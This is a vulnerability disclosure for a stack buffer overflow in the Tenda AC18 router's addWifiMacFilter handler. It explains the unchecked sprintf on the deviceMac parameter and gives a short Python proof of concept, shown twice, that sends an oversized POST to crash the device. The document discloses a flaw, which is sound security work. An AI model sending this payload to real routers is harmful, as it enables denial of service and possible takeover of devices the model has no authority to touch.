Overview

Tenda AC18 V15.03.3.10_EN

Affected version

Tenda AC18 V15.03.3.10_EN

Vulnerability details

The Tenda AC18 V15.03.3.10_EN has a stack overflow vulnerability located in the addWifiMacFilter function.The device_mac variable receives the deviceMac parameter from a POST request and is later assigned to the nptr variable. However, since the user has control over the input of deviceMac, the statement sprintf(nptr, "%s;%d;%s", device_mac, 1, device_id); leads to a buffer overflow. There is no size check, so the user-provided device_mac  can exceed the allocated size of the nptr array (256 bytes), thus triggering this security vulnerability. The attacker can easily perform a Deny of Service Attack or Remote Code Execution with carefully crafted overflow data.

Untitled

PoC

# addWifiMacFilter_2

import requests

ip = '192.168.0.100:80'

url = f"http://{ip}/goform/addWifiMacFilter"

data = {"deviceId":1, "deviceMac":"a"*999}

ret = requests.post(url, data)

Untitled

Additional Information

###Product_version
Tenda AC18 
V15.03.3.10_EN

###Affected_component
the "addWifiMacFilter" function of /bin/httpd; /bin/httpd

###Attack_vector
use a simple exp to attack, like this:
#python3
import requests
ip = '192.168.0.100:80'
url = f"http://{ip}/goform/addWifiMacFilter"
data = {"deviceId":1, "deviceMac":"a"*999}
ret = requests.post(url, data)

###Discription
Tenda AC18 V15.03.3.10_EN was discovered to contain a stack-based buffer overflow vulnerability via the deviceMac parameter at ip/goform/addWifiMacFilter.

###Refernce
<https://palm-vertebra-fe9.notion.site/addWifiMacFilter_2-0f7fab42d4254867b46fe92b25dc7c40>
<https://www.tendacn.com/hk/download/detail-3863.html>
<https://www.tendacn.com/hk/download/detail-3852.html>